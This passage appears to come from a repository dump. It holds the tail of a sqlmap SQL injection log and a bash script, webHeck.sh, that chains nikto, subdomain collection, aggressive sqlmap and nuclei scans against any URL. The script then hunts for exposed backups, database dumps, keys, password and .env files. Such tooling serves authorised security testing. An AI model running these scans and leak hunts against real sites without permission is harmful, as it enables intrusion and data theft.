parameter 'User-Agent' does not seem to be injectable\n[19:33:17] [INFO] testing if parameter 'Referer' is dynamic\n[19:33:17] [WARNING] parameter 'Referer' does not appear to be dynamic\n[19:33:17] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable\n[19:33:17] [INFO] testing for SQL injection on parameter 'Referer'\n[19:33:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[19:33:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'\n[19:33:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'\n[19:33:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'\n[19:33:39] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'\n[19:33:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'\n[19:33:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'\n[19:33:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'\n[19:33:51] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'\n[19:33:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'\n[19:33:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'\n[19:34:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'\n[19:34:05] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'\n[19:34:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'\n[19:34:17] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'\n[19:34:23] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'\n[19:34:29] [INFO] testing 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)'\n[19:34:36] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'\n[19:34:42] [INFO] testing 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'\n[19:34:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'\n[19:34:49] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'\n[19:34:49] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'\n[19:34:49] [INFO] testing 'Oracle boolean-based blind - Parameter replace'\n[19:34:49] [INFO] testing 'Informix boolean-based blind - Parameter replace'\n[19:34:50] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'\n[19:34:50] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'\n[19:34:50] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'\n[19:34:51] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'\n[19:34:51] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'\n[19:34:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'\n[19:34:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'\n[19:34:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'\n[19:34:52] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'\n[19:34:53] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'\n[19:34:53] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'\n[19:34:54] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'\n[19:35:00] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'\n[19:35:04] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'\n[19:35:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[19:35:10] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[19:35:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'\n[19:35:16] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'\n[19:35:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'\n[19:35:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'\n[19:35:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[19:35:29] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'\n[19:35:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'\n[19:35:35] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'\n[19:35:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'\n[19:35:41] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'\n[19:35:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'\n[19:35:48] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'\n[19:35:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'\n[19:35:54] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'\n[19:35:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'\n[19:36:01] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'\n[19:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'\n[19:36:08] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'\n[19:36:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'\n[19:36:14] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'\n[19:36:17] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'\n[19:36:23] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'\n[19:36:27] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'\n[19:36:32] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'\n[19:36:39] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'\n[19:36:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'\n[19:36:44] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'\n[19:36:44] [INFO] testing 'PostgreSQL error-based - Parameter replace'\n[19:36:44] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'\n[19:36:44] [INFO] testing 'Oracle error-based - Parameter replace'\n[19:36:44] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'\n[19:36:45] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'\n[19:36:45] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'\n[19:36:45] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'\n[19:36:48] [INFO] testing 'Generic inline queries'\n[19:36:48] [INFO] testing 'MySQL inline queries'\n[19:36:48] [INFO] testing 'PostgreSQL inline queries'\n[19:36:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'\n[19:36:48] [INFO] testing 'Oracle inline queries'\n[19:36:48] [INFO] testing 'SQLite inline queries'\n[19:36:49] [INFO] testing 'Firebird inline queries'\n[19:36:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\n[19:36:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\n[19:36:54] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\n[19:36:56] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'\n[19:36:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'\n[19:36:59] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'\n[19:37:01] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'\n[19:37:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'\n[19:37:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'\n[19:37:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'\n[19:37:09] [INFO] testing 'Oracle stacked queries (heavy query - comment)'\n[19:37:11] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'\n[19:37:13] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'\n[19:37:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[19:37:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'\n[19:37:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'\n[19:37:24] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'\n[19:37:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'\n[19:37:29] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'\n[19:37:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'\n[19:37:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'\n[19:37:37] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'\n[19:37:42] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'\n[19:37:45] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'\n[19:37:49] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'\n[19:37:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'\n[19:37:55] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'\n[19:37:58] [INFO] testing 'MySQL AND time-based blind (ELT)'\n[19:38:01] [INFO] testing 'MySQL OR time-based blind (ELT)'\n[19:38:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'\n[19:38:08] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'\n[19:38:11] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'\n[19:38:15] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'\n[19:38:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'\n[19:38:21] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'\n[19:38:24] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'\n[19:38:28] [INFO] testing 'Oracle AND time-based blind'\n[19:38:31] [INFO] testing 'Oracle OR time-based blind'\n[19:38:34] [INFO] testing 'Oracle AND time-based blind (heavy query)'\n[19:38:38] [INFO] testing 'Oracle OR time-based blind (heavy query)'\n[19:38:41] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'\n[19:38:44] [INFO] testing 'IBM DB2 OR time-based blind (heavy query)'\n[19:38:47] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'\n[19:38:51] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'\n[19:38:55] [INFO] testing 'Informix AND time-based blind (heavy query)'\n[19:39:00] [INFO] testing 'Informix OR time-based blind (heavy query)'\n[19:39:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'\n[19:39:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'\n[19:39:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'\n[19:39:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'\n[19:39:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'\n[19:39:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'\n[19:39:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'\n[19:39:09] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'\n[19:39:09] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'\n[19:39:09] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'\n[19:39:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'\n[19:39:17] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'\n[19:39:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'\n[19:39:30] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'\n[19:39:36] [WARNING] parameter 'Referer' does not seem to be injectable\n[19:39:36] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'\n[19:39:36] [WARNING] HTTP error codes detected during run:\n403 (Forbidden) - 4957 times\n\n[*] ending @ 19:39:36 /2022-10-03/\n\n"
  },
  {
    "path": "webHeck.sh",
    "content": "#!/bin/bash\n#Created by Graham Zemel, 2022\n#A compilation of tools like nikto, nuclei, sqlmap, and some other helper tools to scan websites.\n#Informational vulnerabilities may be hidden in some cases, feel free to modify the commands.\n\nname=$1\nurl=$2\ntemplates=$3\n\nUsage() { #instant\n       echo -e \"Usage: ||| ./webHeck.sh -n 'siteName' -u 'url' ||| (use full url with 'http(s)://', ex. https://google.com)\"\n       exit 1\n}\nniktoRun() { #maximum of 10 minutes\necho \"Web Heck Scanner, created by Graham Zemel (grahamzemel.com)\"\n\necho \"Starting the following sequence:\"\necho \"--Run Nikto--\"\necho \"--Get subdomains--\"\necho \"--Run Sqlmap heristic test--\"\necho \"--Run Nuclei--\"\necho \"--Filter filetypes--\"\necho \"--Clean up directory--\"\necho \"--Profit!--\"\n#Make proj config stuff run nikto on site\n#if current directory contains $name as a folder, delete a folder with the same name\nif [ -d \"$name\" ]; then\n        rm -rf $name\nfi\nmkdir $name\necho \"\"\necho \"----INITAL CONFIGURATION COMPLETE----\"\necho \"----COMMENCING NIKTO SCAN ~10m----\"\n\"nikto/program/nikto.pl\" -url $url -maxtime 10m > \"${name}/niktoScan.txt\"\n}\ngetSubdomains() { #roughly 30 seconds\necho \"----COLLECTING SUBDOMAINS ~30s----\"\n#upon killing this command, log the error and continue\n\"req_solos/gau\" --threads 10 --subs $url > \"${name}/liveSubs.txt\" & \nsleep 30 \nkill $!\nif [ -s \"${name}/liveSubs.txt\" ]; then\n        echo \"Subdomains found!\"\n        cat \"${name}/liveSubs.txt\" | head -n 1000 > \"${name}/liveSubs1000.txt\"\n        rm \"${name}/liveSubs.txt\"\n        echo \"Success! Total targets: $(wc -l ${name}/liveSubs1000.txt | awk '{print $1}') (yes, it is supposed to show the 'Terminated message'.)\"\n        cat \"${name}/liveSubs1000.txt\" | \"req_solos/gauplus\" —random-agent —subs -t 5000 | \"req_solos/anew\" -q \"${name}/subsToFilter.txt\"\n        cat \"${name}/subsToFilter.txt\" | cut -d\"?\" -f1 | cut -d\"=\" -f1 > \"${name}/filtered.txt\"\nelse\n        echo \"No subdomains found!\"\n        rm -rf \"${name}/nucleiResults.txt\"\nfi\n\n}\n# In case anyone's wondering, I can't swap sqlmapRun and nucleiRun's locations b/c some file error comes up that I don't have the energy to fix\n# It works though, so I'm not gonna touch it (in true programmer fashion) -GZ\nsqlmapRun(){ #instant\necho \"----RUNNING SQLMAP ~instant-10m----\"\necho \"Running heuristic test (POSITIVE if 'Completed' not displayed within 5 seconds)\"\n\"sqlmap/sqlmap.py\" --level 3 --risk 3 --batch --eta --smart -url $url > \"${name}/sqlVuln.txt\"\necho \"Completed heuristic test\"\n}\nnucleiRun(){ #roughly 10 mins depending on site size\necho \"----RUNNING NUCLEI ~1m-10m----\"\n\"nuclei/nuclei\" -as -es info -l \"${name}/liveSubs1000.txt\" -stats -si 30 -silent > \"${name}/nucleiResults.txt\"\nif [ -s \"${name}/nucleiResults.txt\" ]; then\n        echo \"----LOCATED VULNERABILITIES----\"\nelse\n        echo \"----NO VULNERABILITIES FOUND----\"\n        rm -rf \"${name}/nucleiResults.txt\"\nfi\n}\nfilterAndClean() { #instant\necho \"----FILTERING FILETYPES ~instant----\"\ngrep -iaE \"([^.]+)\\.zip$|([^.]+)\\.zip\\.[0-9]+$|([^.]+)\\.zip[0-9]+$|([^.]+)\\.zip[a-z][A-Z][0-9]+$|([^.]+)\\.zip\\.[a-z][A-Z][0-9]+$|([^.]+)\\.rar$|([^.]+)\\.tar$|([^.]+)\\.tar\\.gz$|([^.]+)\\.tgz$|([^.]+)\\.sql$|([^.]+)\\.db$|([^.]+)\\.sqlite$|([^.]+)\\.pgsql\\.txt$|([^.]+)\\.mysql\\.txt$|([^.]+)\\.gz$|([^.]+)\\.config$|([^.]+)\\.log$|([^.]+)\\.bak$|([^.]+)\\.backup$|([^.]+)\\.bkp$|([^.]+)\\.crt$|([^.]+)\\.dat$|([^.]+)\\.eml$|([^.]+)\\.java$|([^.]+)\\.lst$|([^.]+)\\.key$|([^.]+)\\.passwd$|([^.]+)\\.pl$|([^.]+)\\.pwd$|([^.]+)\\.mysql-connect$|([^.]+)\\.jar$|([^.]+)\\.cfg$|([^.]+)\\.dir$|([^.]+)\\.orig$|([^.]+)\\.bz2$|([^.]+)\\.old$|([^.]+)\\.vbs$|([^.]+)\\.img$|([^.]+)\\.inf$|([^.]+)\\.sh$|([^.]+)\\.py$|([^.]+)\\.vbproj$|([^.]+)\\.mysql-pconnect$|([^.]+)\\.war$|([^.]+)\\.go$|([^.]+)\\.psql$|([^.]+)\\.sql\\.gz$|([^.]+)\\.vb$|([^.]+)\\.webinfo$|([^.]+)\\.jnlp$|([^.]+)\\.cgi$|([^.]+)\\.temp$|([^.]+)\\.ini$|([^.]+)\\.webproj$|([^.]+)\\.xsql$|([^.]+)\\.raw$|([^.]+)\\.inc$|([^.]+)\\.lck$|([^.]+)\\.nz$|([^.]+)\\.rc$|([^.]+)\\.html\\.gz$|([^.]+)\\.gz$|([^.]+)\\.env$|([^.]+)\\.yml$\" $name/filtered.txt | sort -u | \"req_solos/httpx\" -silent -follow-redirects -threads 800 -mc 200 > \"${name}/leaks.txt\"\nrm -rf \"${name}/filtered.txt\" \"${name}/liveSubs1000.txt\" \"${name}/subsToFilter.txt\" \"${name}/critUrls.txt\"\n}\ncleanLeaks() { #instant\nmkdir \"${name}/output\" 2> /dev/null\necho \"----CLEANING LEAKS ~instant----\"\no=$(grep -aiE \"([^.]+)\\.zip$\" ${name}/leaks.txt | tee ${name}/output/zip.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀zip found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.zip\\.[0-9]+$\" ${name}/leaks.txt | tee ${name}/output/zip.NUM.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀zip.NUM found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.zip[0-9]+$\" ${name}/leaks.txt | tee ${name}/output/zip_NUM.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀zip_NUM found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.zip[a-z][A-Z][0-9]+$\" ${name}/leaks.txt | tee ${name}/output/zip_alpha_ALPHA_NUM.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀zip_alpha_ALPHA_NUM found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.zip\\.[a-z][A-Z][0-9]+$\" ${name}/leaks.txt | tee ${name}/output/zip.alpha_ALPHA_NUM.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀zip.alpha_ALPHA_NUM found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.rar$\" ${name}/leaks.txt | tee ${name}/output/rar.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀rar found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.tar$\" ${name}/leaks.txt | tee ${name}/output/tar.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀tar found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.tar\\.gz$\" ${name}/leaks.txt | tee ${name}/output/tar.gz.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀tar.gz found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.tgz$\" ${name}/leaks.txt | tee ${name}/output/tgz.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀tgz found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.sql$\" ${name}/leaks.txt | tee ${name}/output/sql.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀sql found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.db$\" ${name}/leaks.txt | tee ${name}/output/db.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀db found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.sqlite$\" ${name}/leaks.txt | tee ${name}/output/sqlite.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀sqlite found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.pgsql\\.txt$\" ${name}/leaks.txt | tee ${name}/output/pgsql.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀pgsql found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.mysql\\.txt$\" ${name}/leaks.txt | tee ${name}/output/mysql.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀mysql found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.gz$\" ${name}/leaks.txt | tee ${name}/output/gz.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀gz found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.config$\" ${name}/leaks.txt | tee ${name}/output/config.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀config found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.log$\" ${name}/leaks.txt | tee ${name}/output/log.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀log found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.bak$\" ${name}/leaks.txt | tee ${name}/output/bak.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀bak found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.backup$\" ${name}/leaks.txt | tee ${name}/output/backup.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀backup found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.bkp$\" ${name}/leaks.txt | tee ${name}/output/bkp.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀bkp found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.crt$\" ${name}/leaks.txt | tee ${name}/output/crt.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀crt found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.dat$\" ${name}/leaks.txt | tee ${name}/output/dat.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀dat found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.eml$\" ${name}/leaks.txt | tee ${name}/output/eml.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀eml found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.java$\" ${name}/leaks.txt | tee ${name}/output/java.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀java found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.lst$\" ${name}/leaks.txt | tee ${name}/output/lst.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀lst found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.key$\" ${name}/leaks.txt | tee ${name}/output/key.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀key found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.passwd$\" ${name}/leaks.txt | tee ${name}/output/passwd.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀passwd found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.pl$\" ${name}/leaks.txt | tee ${name}/output/pl.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀pl found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.pwd$\" ${name}/leaks.txt | tee ${name}/output/pwd.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀pwd found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.mysql-connect$\" ${name}/leaks.txt | tee ${name}/output/mysql-connect.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀mysql-connect found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.jar$\" ${name}/leaks.txt | tee ${name}/output/jar.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀jar found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.cfg$\" ${name}/leaks.txt | tee ${name}/output/cfg.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀cfg found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.dir$\" ${name}/leaks.txt | tee ${name}/output/dir.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀dir found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.orig$\" ${name}/leaks.txt | tee ${name}/output/orig.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀orig found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.bz2$\" ${name}/leaks.txt | tee ${name}/output/bz2.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀bz2 found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.old$\" ${name}/leaks.txt | tee ${name}/output/old.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀old found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.vbs$\" ${name}/leaks.txt | tee ${name}/output/vbs.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀vbs found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.img$\" ${name}/leaks.txt | tee ${name}/output/img.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀img found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.inf$\" ${name}/leaks.txt | tee ${name}/output/inf.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀inf found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.sh$\" ${name}/leaks.txt | tee ${name}/output/sh.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀sh found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.py$\" ${name}/leaks.txt | tee ${name}/output/py.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀py found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.vbproj$\" ${name}/leaks.txt | tee ${name}/output/vbproj.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀vbproj found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.mysql-pconnect$\" ${name}/leaks.txt | tee ${name}/output/mysql-pconnect.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀mysql-pconnect found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.war$\" ${name}/leaks.txt | tee ${name}/output/war.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀war found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.go$\" ${name}/leaks.txt | tee ${name}/output/go.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀go found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.psql$\" ${name}/leaks.txt | tee ${name}/output/psql.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀psql found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.sql\\.gz$\" ${name}/leaks.txt | tee ${name}/output/sql.gz.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀sql.gz found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.vb$\" ${name}/leaks.txt | tee ${name}/output/vb.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀vb found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.webinfo$\" ${name}/leaks.txt | tee ${name}/output/webinfo.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀webinfo found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.jnlp$\" ${name}/leaks.txt | tee ${name}/output/jnlp.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀jnlp found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.cgi$\" ${name}/leaks.txt | tee ${name}/output/cgi.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀cgi found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.temp$\" ${name}/leaks.txt | tee ${name}/output/temp.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀temp found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.ini$\" ${name}/leaks.txt | tee ${name}/output/ini.txt | wc -l);if [[ $o -gt 0 ]];then echo -e \"💀ini found.💀\";fi\no=$(grep -aiE \"([^.]+)\\.webproj$\" 